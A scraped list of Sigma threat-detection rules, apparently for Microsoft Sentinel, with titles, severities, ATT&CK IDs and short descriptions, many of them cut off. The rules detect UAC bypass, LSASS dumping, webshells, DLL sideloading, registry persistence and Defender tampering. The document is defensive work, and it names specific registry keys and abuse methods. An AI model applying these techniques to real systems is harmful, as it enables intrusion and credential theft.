Detects uncommon child processes of Appvlp.EXE Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Norma
Webshell Hacking Activity Patterns
sigma high
T1505.003T1018T1033T1087
imProcessCreate
Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
Webshell Tool Reconnaissance Activity
sigma high
T1505.003
imProcessCreate
Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help com
T1190
imWebSession
Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP
Office Application Startup - Office Test
sigma medium
T1137.002
imRegistry
Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started
HackTool - CrackMapExec Execution Patterns
sigma high
T1047T1053T1059.003T1059.001
imProcessCreate
Detects various execution patterns of the CrackMapExec pentesting framework
T1685
imRegistry
Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.
Potentially Suspicious Child Process Of VsCode
sigma medium
T1218T1202
imProcessCreate
Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
imFileEvent
Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.
Visual Studio Code Tunnel Remote File Creation
sigma medium
imFileEvent
Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature
Visual Studio Code Tunnel Service Installation
sigma medium
T1071.001
imProcessCreate
Detects the installation of VsCode tunnel (code-tunnel) as a service.
Visual Studio Code Tunnel Shell Execution
sigma medium
T1071.001
imProcessCreate
Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system
PowerShell Profile Modification
sigma medium
T1546.013
imFileEvent
Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
T1003.001
imFileEvent
Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
ADSI-Cache File Creation By Uncommon Tool
sigma medium
T1001.003
imFileEvent
Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.
Arbitrary File Download Via GfxDownloadWrapper.EXE
sigma medium
T1105
imProcessCreate
Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.
imRegistry
Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.
Suspicious LNK Double Extension File Created
sigma medium
T1036.007
imFileEvent
Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
Potential Webshell Creation On Static Website
sigma medium
T1505.003
imFileEvent
Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
T1059.003
imFileEvent
Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\<usern
T1564.004
imFileEvent
Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powers
T1564.004
imProcessCreate
Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell
T1112
imRegistry
Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security
COM Hijack via Sdclt
sigma high
T1546T1548
imRegistry
Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
T1548.002
imProcessCreate
Adversaries may leverage suspicious child processes of eventvwr.exe to bypass UAC and execute privileged code, indicating potential elevation of privilege. SOC teams should proactively hunt for
UAC Bypass via Event Viewer
sigma high
T1548.002
imRegistry
Detects UAC bypass method using Windows event viewer
imFileEvent
Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments
DLL Load By System Process From Suspicious Locations
sigma medium
T1070
DeviceImageLoadEvents
Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
Network Connection Initiated By Regsvr32.EXE
sigma medium
T1559.001T1218.010
imNetworkSession
Detects a network connection initiated by "Regsvr32.exe"
Remote DLL Load Via Rundll32.EXE
sigma medium
T1204.002
DeviceImageLoadEvents
Detects a remote DLL load event via "rundll32.exe".
T1048.003
imProcessCreate
Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (host
Uncommon Child Process Of AddinUtil.EXE
sigma medium
T1218
imProcessCreate
Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store pay
T1218
imProcessCreate
Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
Browser Execution In Headless Mode
sigma low
T1105T1564.003
imProcessCreate
Detects execution of Chromium based browser in headless mode
Winrar Compressing Dump Files
sigma medium
T1560.001
imProcessCreate
Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
imProcessCreate
Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).
Potentially Suspicious DMP/HDMP File Creation
sigma medium
imFileEvent
Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can someti
imRegistry
Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files fro
imProcessCreate
Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files fro
Old TLS1.0/TLS1.1 Protocol Version Enabled
sigma medium
imRegistry
Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.
T1059.012T1098
imProcessCreate
Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
ESXi Network Configuration Discovery Via ESXCLI
sigma medium
T1033T1007T1059.012
imProcessCreate
Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
ESXi Storage Information Discovery Via ESXCLI
sigma medium
T1033T1007T1059.012
imProcessCreate
Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and Loc
ESXi Syslog Configuration Change Via ESXCLI
sigma medium
T1562.001T1562.003T1059.012
imProcessCreate
Detects changes to the ESXi syslog configuration via "esxcli"
ESXi System Information Discovery Via ESXCLI
sigma medium
T1033T1007T1059.012
imProcessCreate
Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.
ESXi VM Kill Via ESXCLI
sigma medium
T1059.012T1529
imProcessCreate
Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.
ESXi VM List Discovery Via ESXCLI
sigma medium
T1033T1007T1059.012
imProcessCreate
Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
ESXi VSAN Information Discovery Via ESXCLI
sigma medium
T1033T1007T1059.012
imProcessCreate
Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
SQL Injection Strings In URI
sigma high
T1190
imWebSession
Detects potential SQL injection attempts via GET requests in access logs.
T1202
imProcessCreate
Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
LSASS Dump Keyword In CommandLine
sigma high
T1003.001
imProcessCreate
Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
T1102
imProcessCreate
Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service
T1082
imProcessCreate
Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
T1082
imProcessCreate
Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery
SCR File Write Event
sigma medium
T1218.011
imFileEvent
Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
Suspicious Execution Location Of Wermgr.EXE
sigma high
imProcessCreate
Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.
ESXi Account Creation Via ESXCLI
sigma medium
T1136T1059.012
imProcessCreate
Detects user account creation on ESXi system via esxcli
T1685
imProcessCreate
Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious
Potentially Suspicious WebDAV LNK Execution
sigma medium
T1059.001T1204
imProcessCreate
Detects possible execution via LNK file accessed on a WebDAV server.
T1112
imRegistry
Detect set Notification_Suppress to 1 to disable the Windows security center notification
Add Debugger Entry To AeDebug For Persistence
sigma medium
imRegistry
Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes
imRegistry
The hypothesis detects adversaries modifying the "Hangs" registry key to inject a Debugger entry, enabling persistence by triggering malicious
Add DisallowRun Execution to Registry
sigma medium
T1112
imRegistry
Detect set DisallowRun to 1 to prevent user running specific computer program
Allow RDP Remote Assistance Feature
sigma medium
T1112
imRegistry
Detect enable rdp feature to allow specific user to rdp connect on the targeted machine
Assembly Loading Via CL_LoadAssembly.ps1
sigma medium
T1216
imProcessCreate
Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls.
Bypass UAC Using DelegateExecute
sigma high
T1548.002
imRegistry
Bypasses User Account Control using a fileless method
Bypass UAC Using Event Viewer
sigma high
T1547.010
imRegistry
Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
ClickOnce Trust Prompt Tampering
sigma medium
T1112
imRegistry
Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.
CrashControl CrashDump Disabled
sigma medium
T1564T1112
imRegistry
Detects disabling the CrashDump per registry (as used by HermeticWiper)
CurrentControlSet Autorun Keys Modification
sigma medium
T1547.001
imRegistry
Detects modification of autostart extensibility point (ASEP) in registry.
Custom File Open Handler Executes PowerShell
sigma high
T1202
imRegistry
Detects the abuse of custom file open handler, executing powershell
DHCP Callout DLL Installation
sigma high
T1574.001T1112
imRegistry
Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
T1685
imRegistry
Detects disabling Windows Defender Exploit Guard Network Protection
Disable Macro Runtime Scan Scope
sigma high
imRegistry
Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
Disable Privacy Settings Experience in Registry
sigma medium
T1685
imRegistry
Detects registry modifications that disable Privacy Settings Experience
Disable PUA Protection on Windows Defender
sigma high
T1685
imRegistry
Detects disabling Windows Defender PUA protection
Disable Tamper Protection on Windows Defender
sigma medium
T1685
imRegistry
Detects disabling Windows Defender Tamper Protection
Disable Windows Firewall by Registry
sigma medium
T1686.003
imRegistry
Detect set EnableFirewall to 0 to disable the Windows firewall
Disable Windows Security Center Notifications
sigma medium
T1112
imRegistry
Detect set UseActionCenterExperience to 0 to disable the Windows security center notification
Disabled Windows Defender Eventlog
sigma high
T1685
imRegistry
Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
DNS-over-HTTPS Enabled by Registry
sigma medium
T1140T1112
imRegistry
Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into dat
Enable Local Manifest Installation With Winget
sigma medium
imRegistry
Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
Enable Microsoft Dynamic Data Exchange
sigma medium
T1559.002
imRegistry
Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.
ETW Logging Disabled For rpcrt4.dll
sigma low
T1112T1685
imRegistry
Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
ETW Logging Disabled For SCM
sigma low
T1112T1685
imRegistry
Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
T1112T1685
imRegistry
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
Execution DLL of Choice Using WAB.EXE
sigma high
T1218
imRegistry
This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
Hide Schedule Task Via Index Value Tamper
sigma high
T1685
imRegistry
Detects when the "index" value of a scheduled task is modified from the registry Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information ab
IE Change Domain Zone
sigma medium
T1137
imRegistry
Hides the file extension through modification of the registry
Internet Explorer Autorun Keys Modification
sigma medium
T1547.001
imRegistry
Detects modification of autostart extensibility point (ASEP) in registry.
T1105
imRegistry
Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be i
T1003.001
imRegistry
Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
T1112
imRegistry
Adversaries may leverage macro-enabled documents in suspicious registry paths to execute malicious code and establish persistence by manipulating Office trust records
Microsoft Office Protected View Disabled
sigma high
T1685
imRegistry
Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.
NET NGenAssemblyUsageLog Registry Key Tamper
sigma high
T1112
imRegistry
Detects changes to the NGenAssemblyUsageLog registry key. .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring
New Application in AppCompat
sigma low
T1204.002
imRegistry
A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
New DNS ServerLevelPluginDll Installed
sigma high
T1574.001T1112
imRegistry
Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
New File Association Using Exefile
sigma high
imRegistry
Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
New ODBC Driver Registered
sigma low
imRegistry
Detects the registration of a new ODBC driver.
New Root or CA or AuthRoot Certificate to Store
sigma medium
T1490
imRegistry
Detects the addition of new root, CA or AuthRoot certificates to the Windows registry
T1112
imRegistry
Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
T1137T1008T1546
imRegistry
Detects the modification of Outlook security setting to allow unprompted execution of macros.
Persistence Via Disk Cleanup Handler - Autorun
sigma medium
imRegistry
Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. The disk cleanup manager is part of the operating system. It displays the dialo
Persistence Via Hhctrl.ocx
sigma high
imRegistry
The hypothesis detects an adversary modifying the registry to redirect the "hhctrl" entry to a malicious binary, indicating persistence via a custom payload to maintain access. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify stealthy persistence mechanisms often used in advanced threats that evade traditional detection.
Persistence Via New SIP Provider
sigma medium
T1553.003
imRegistry
Detects when an attacker register a new SIP provider for persistence and defense evasion
Potential AMSI COM Server Hijacking
sigma high
T1685
imRegistry
Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non
imRegistry
Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)
imRegistry
Detects tampering with attachment manager settings policies attachments (See reference for more information)
T1003
imRegistry
Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
Potential EventLog File Location Tampering
sigma high
T1685.001
imRegistry
Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting
Potential Persistence Using DebugPath
sigma medium
T1546.015
imRegistry
Detects potential persistence using Appx DebugPath
T1546.012
imRegistry
Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence The entries found under
Potential Persistence Via AutodialDLL
sigma high
imRegistry
Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library
Potential Persistence Via CHM Helper DLL
sigma high
imRegistry
Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence
Potential Persistence Via DLLPathOverride
sigma high
imRegistry
Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process
T1137.006
imRegistry
Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.
Potential Persistence Via LSA Extensions
sigma high
imRegistry
Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. The "Extensions" list contains filenames of DLLs being automatic
Potential Persistence Via Mpnotify
sigma high
imRegistry
Detects when an attacker register a new SIP provider for persistence and defense evasion
T1137T1008T1546
imRegistry
Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
Potential Persistence Via Scrobj.dll COM Hijacking
sigma medium
T1546.015
imRegistry
Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute
T1546.011
imRegistry
Detects the installation of a new shim database where the file is located in a non-default location
Potential Persistence Via TypedPaths
sigma high
imRegistry
Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt
T1216
imProcessCreate
Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"
T1218
imRegistry
Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
Potential PSFactoryBuffer COM Hijacking
sigma high
T1546.015
imRegistry
Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.
T1491.001
imRegistry
Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages
T1574
imRegistry
Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes
T1053.005
imRegistry
Detects potential persistence behavior using the windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telem
T1216
imProcessCreate
Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
imRegistry
Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
T1003
imRegistry
Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
PowerShell as a Service in Registry
sigma high
T1569.002
imRegistry
Detects that a powershell code is written to the registry as a service.
T1564.001T1112
imRegistry
Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
Registry Disable System Restore
sigma high
T1490
imRegistry
Detects the modification of the registry to disable a system restore on the computer
Registry Explorer Policy Modification
sigma medium
T1112
imRegistry
Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)
Registry Hide Function from User
sigma medium
T1112
imRegistry
Ad
Registry Modification to Hidden File Extension
sigma medium
T1137
imRegistry
Hides the file extension through modification of the registry
T1133
imRegistry
Running Chrome VPN Extensions via the Registry install 2 vpn extension
ScreenSaver Registry Key Set
sigma medium
T1218.011
imRegistry
Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
T1685
imRegistry
Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
Session Manager Autorun Keys Modification
sigma medium
T1547.001T1546.009
imRegistry
Detects modification of autostart extensibility point (ASEP) in registry.
T1685
imRegistry
Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings
imRegistry
Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings
Suspicious Keyboard Layout Load
sigma medium
T1588.002
imRegistry
Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only
Suspicious Printer Driver Empty Manufacturer
sigma high
T1574
imRegistry
Detects a suspicious printer driver installation with an empty Manufacturer value
Suspicious Service Installed
sigma medium
T1685
imRegistry
Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), whi
System Scripts Autorun Keys Modification
sigma medium
T1547.001
imRegistry
Detects modification of autostart extensibility point (ASEP) in registry.
Tamper With Sophos AV Registry Keys
sigma high
T1685
imRegistry
Detects tamper attempts to sophos av functionality via registry key modification
Trust Access Disable For VBApplications
sigma high
T1112
imRegistry
Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft
T1548.002
imRegistry
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
T1548.002
imRegistry
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
UAC Bypass via Sdclt
sigma high
T1548.002
imRegistry
Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
T1588.002
imRegistry
Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution
VBScript Payload Stored in Registry
sigma high
T1547.001
imRegistry
Detects VBScript content stored into registry keys as seen being used by UNC2452 group
Wdigest Enable UseLogonCredential
sigma high
T1112
imRegistry
Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
Windows Defender Exclusions Added - Registry
sigma medium
T1685
imRegistry
Detects the Setting of Windows Defender Exclusions
Winget Admin Settings Modification
sigma low
imRegistry
Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
Winlogon AllowMultipleTSSessions Enable
sigma medium
T1112
imRegistry
Detects when the 'AllowMultipleTSSessions' value is enabled. Which allows for multiple Remote Desktop connection sessions to be opened at once. This is often used by attacker as a way to connect to an
Winlogon Notify Key Logon Persistence
sigma high
T1547.004
imRegistry
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure att
WinSock2 Autorun Keys Modification
sigma medium
T1547.001
imRegistry
Detects modification of autostart extensibility point (ASEP) in registry.
Wow6432Node Classes Autorun Keys Modification
sigma medium
T1547.001
imRegistry
Detects modification of autostart extensibility point (ASEP) in registry.
New BgInfo.EXE Custom DB Path Registry Configuration
sigma medium
T1112
imRegistry
Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate
T1112
imRegistry
Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"
T1112
imRegistry
Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"
Suspicious Child Process Of BgInfo.EXE
sigma high
T1059.005T1218T1202
imProcessCreate
Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
Uncommon Child Process Of BgInfo.EXE
sigma medium
T1059.005T1218T1202
imProcessCreate
Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
WSL Child Process Anomaly
sigma medium
T1218T1202
imProcessCreate
Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
Assembly DLL Creation Via AspNetCompiler
sigma medium
imFileEvent
Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
Suspicious Child Process of AspNetCompiler
sigma high
T1127
imProcessCreate
Detects potentially suspicious child processes of "aspnet_compiler.exe".
File Decryption Using Gpg4win
sigma medium
imProcessCreate
Detects usage of Gpg4win to decrypt files
imProcessCreate
Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.
File Encryption Using Gpg4win
sigma medium
imProcessCreate
Detects usage of Gpg4win to encrypt files
T1218
imProcessCreate
Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
T1218
imProcessCreate
Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
Suspicious Provlaunch.EXE Child Process
sigma high
T1218
imProcessCreate
Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
CSExec Service File Creation
sigma medium
T1569.002
imFileEvent
Detects default CSExec service filename which indicates CSExec service installation and execution
Potential Mpclient.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
T1574.001
imProcessCreate
Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
RemCom Service File Creation
sigma medium
T1569.002
imFileEvent
Detects default RemCom service filename which indicates RemCom service installation and execution
Potential AVKkid.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "AVKkid.dll"
Potential EACore.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "EACore.dll"
Potential Linux Amazon SSM Agent Hijacking
sigma medium
T1219.002
imProcessCreate
Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
Potential Mfdetours.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directo
Potential Mftrace.EXE Abuse
sigma medium
T1127
imProcessCreate
Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.
Potential Vivaldi_elf.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "vivaldi_elf.dll"
Potential Amazon SSM Agent Hijacking
sigma medium
T1219.002
imProcessCreate
Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
T1547.015
imFileEvent
Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
Use NTFS Short Name in Image
sigma medium
T1564.004
imProcessCreate
Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection
Potential CCleanerDU.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "CCleanerDU.dll"
Potential CCleanerReactivator.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "CCleanerReactivator.dll"
imProcessCreate
Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
T1059
DeviceImageLoadEvents
Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
Legitimate Application Dropped Executable
sigma high
T1218
imFileEvent
Detects programs on a Windows system that should not write executables to disk
Legitimate Application Dropped Script
sigma high
T1218
imFileEvent
Detects programs on a Windows system that should not write scripts to disk
T1137
imFileEvent
Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
Windows Registry Trust Record Modification
sigma medium
T1566.001
imRegistry
Alerts on trust record modification within the registry, indicating usage of macros
Potential appverifUI.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "appverifUI.dll"
Potential ShellDispatch.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "ShellDispatch.dll"
Linux Base64 Encoded Pipe to Shell
sigma medium
T1140
imProcessCreate
Detects suspicious process command line that uses base64 encoded input for execution with a shell
Named Pipe Created Via Mkfifo
sigma low
imProcessCreate
Detects the creation of a new named pipe using the "mkfifo" utility
Potentially Suspicious Named Pipe Created Via Mkfifo
sigma medium
imProcessCreate
Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location
Potential Waveedit.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
imProcessCreate
Detects potentially suspicious child processes of a ClickOnce deployment application
Potential 7za.DLL Sideloading
sigma low
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "7za.dll"
Potential Edputil.DLL Sideloading
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "edputil.dll"
T1037.001
imProcessCreate
Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence
T1574.001
DeviceImageLoadEvents
Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
Uncommon Child Processes Of SndVol.exe
sigma medium
imProcessCreate
Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)
Potential Persistence Via GlobalFlags
sigma high
T1546.012
imRegistry
Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
Security Service Disabled Via Reg.EXE
sigma high
T1685
imProcessCreate
Detects execution of "reg.exe" to disable security services such as Windows Defender.
Crontab Enumeration
sigma low
T1007
imProcessCreate
Detects usage of crontab to list the tasks of the user
T1105
imProcessCreate
Detects the use of wget to download content to a suspicious directory
imProcessCreate
Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.
OS Architecture Discovery Via Grep
sigma low
T1082
imProcessCreate
